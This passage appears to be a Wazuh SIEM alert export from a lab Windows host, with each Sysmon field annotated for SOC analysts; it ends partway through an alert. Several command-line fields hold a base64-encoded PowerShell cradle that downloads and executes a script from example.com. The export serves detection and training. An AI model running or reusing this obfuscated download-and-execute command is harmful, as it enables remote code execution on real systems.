data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:18.662 ProcessGuid: {94294ddc-bca6-680a-900a-000000000e00} ProcessId: 13940 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bca4-680a-8e0a-000000000e00} ParentProcessId: 13604 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:18.662
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bca6-680a-900a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13940
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bca4-680a-8e0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13604
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.274+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.864509
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:20.0085076Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281759
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:19.991 ProcessGuid: {94294ddc-bca6-680a-900a-000000000e00} ProcessId: 13940 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_if1icrzi.oi2.ps1 CreationUtcTime: 2025-04-24 22:35:19.989 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:19.991
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bca6-680a-900a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13940
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_if1icrzi.oi2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:19.989
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.319+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.319+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.867277
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:25.2990647Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281809
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:25.289 ProcessGuid: {94294ddc-bcac-680a-950a-000000000e00} ProcessId: 10760 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_umgehqh1.lii.ps1 CreationUtcTime: 2025-04-24 22:35:25.289 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:25.289
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcac-680a-950a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10760
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_umgehqh1.lii.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:25.289
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.399+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.399+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.870045
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:27.3616052Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281843
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:27.354 ProcessGuid: {94294ddc-bcad-680a-970a-000000000e00} ProcessId: 9580 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_sqqlcpdl.oin.ps1 CreationUtcTime: 2025-04-24 22:35:27.354 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:27.354
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcad-680a-970a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9580
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_sqqlcpdl.oin.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:27.354
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.498+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.498+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.872809
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:32.4516011Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281891
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:32.449 ProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} ProcessId: 2732 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_okjzviqs.4g5.ps1 CreationUtcTime: 2025-04-24 22:35:32.449 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:32.449
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcb3-680a-9b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2732
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_okjzviqs.4g5.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:32.449
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.498+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.498+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.875573
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:32.2957666Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281890
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
